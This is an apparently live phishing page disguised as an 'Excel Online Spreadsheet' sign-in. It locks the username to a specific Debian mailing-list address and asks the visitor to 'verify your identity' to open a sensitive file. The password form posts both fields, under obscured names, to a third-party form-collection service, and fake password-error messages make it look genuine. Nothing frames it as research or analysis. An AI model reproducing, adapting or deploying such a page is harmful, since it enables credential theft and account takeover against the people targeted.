<html lang="en">
<head>
<meta http-equiv="x-ua-compatible" content="EmulateIE9">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
<link rel="icon" type="image/ico" href="https://i.gyazo.com/83cffd1ebf23ed93aa925eb9529f5348.png">
<title>Excel Online Spreadsheet :: Sign in</title>
</head>
<body style="background-image: url(https://i.gyazo.com/bfa2348a5d6cd12286c8c4ae544951a7.jpg); background-repeat: no-repeat;background-size: cover;">
<div class="container-fluid p-0">
<div class="container">
<div class="row my-5">
<div class="col-lg-5 mx-auto">
<div class="m-5 p-4 bg-white rounded" id="div1" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);">
<div class="text-center">
<span><img src='https://i.gyazo.com/0dcf5bc75c17513b4d7c2d958771d294.jpg'/></span><span class="pl-4 h5 align-middle"> </span><br><br>
<span class="h3">Sign in</span><br>
<span class="h5"></span><br>
<span class="h">Because you're accessing a sensitive file, you need to verify your identity.</span><br>
<span id="msg" class="text-danger" style="display: none;">Invalid Password..! Please enter correct password.</span><br>
<span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
<small></small>
<div class="form-group">
<form action="https://submit-form.com/A7avFXMY" method="post">
<input type="email" id="login" name="AA" class="form-control rounded-0 bg-transparent" aria-describedby="aiHelp" placeholder="Username" value="python-apps-team@lists.alioth.debian.org" readonly autofocus required >
</div>
<div class="form-group mt-2">
<small></small>
<input type="password" id="passwd" name="BB" class="form-control" aria-describedby="aiHelp" placeholder="Password" autofocus required>
</div>
</div>
<div class="form-check mt-3">
<input type="checkbox" class="form-check-input" id="exampleCheck1">
<label class="form-check-label" for="exampleCheck1"><span><a href="#">Remember Me.</a></span></label>
<span><span><a href="#" class="float-right"></a></span></span>
</div>
<div class="col-lg-12 mt-3">
<button type="submit" class="btn text-white px-4 w-100" id="submit-btn" style="background-color: #036e2a;">Sign in</button>
</div>
</div>
</div>
</html>